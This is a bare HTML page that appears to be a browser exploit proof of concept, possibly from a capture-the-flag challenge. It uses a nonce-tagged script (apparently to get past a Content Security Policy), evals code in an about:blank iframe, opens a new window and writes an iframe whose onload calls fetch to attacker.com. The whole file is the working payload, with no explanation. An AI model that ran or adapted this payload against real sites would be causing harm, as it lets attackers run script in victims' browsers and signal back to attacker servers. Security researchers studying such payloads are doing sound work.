<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGmvZXZGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGmvZXZGGGGG.onload=_=>GGGGGmvZXZGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe onload=\x22fetch(`https://attacker.com/report/report`)\x22><\/iframe>');");GGGGGmvZXZGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>